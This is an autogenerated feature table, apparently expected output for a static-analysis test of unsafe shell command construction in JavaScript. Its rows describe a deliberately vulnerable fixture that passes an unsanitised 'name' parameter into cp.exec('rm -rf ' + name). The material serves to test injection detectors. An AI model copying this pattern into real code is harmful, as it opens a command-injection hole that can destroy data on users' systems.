autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | receiverName | dispatch | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:0 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:8 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:8 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp = re ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:7:1:35 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:18 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:18 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:20:1:34 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:6 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:5:1 | module. ... gged.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:5:1 | module. ... gged.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:1:5:1 | module. ... gged.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:8:3:14 | exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | functio ... gged.\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | functio ... gged.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | functio ... gged.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | functio ... gged.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:3 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:5:4:8 | exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:1:1:1:0 | this | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:2:6 | define | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:2:6 | define | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:2:6 | define | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | define( ... };\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | define( ... };\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | define( ... };\\n}) | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | exceptional return of define( ... };\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | exceptional return of define( ... };\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | exceptional return of define( ... };\\n}) | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:2:7 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:2:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:2:7 | this | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:2:7 | this | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:2:7 | this | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | 'arguments' object of anonymous function | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | 'arguments' object of anonymous function | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | 'arguments' object of anonymous function | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | exceptional return of anonymous function | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | exceptional return of anonymous function | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | exceptional return of anonymous function | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | functio ... \\n };\\n} | CalleeFlexibleAccessPath | define | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | functio ... \\n };\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | functio ... \\n };\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | functio ... \\n };\\n} | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | functio ... \\n };\\n} | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | return of anonymous function | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | return of anonymous function | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:8:6:1 | return of anonymous function | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | contextFunctionInterfaces | | +| 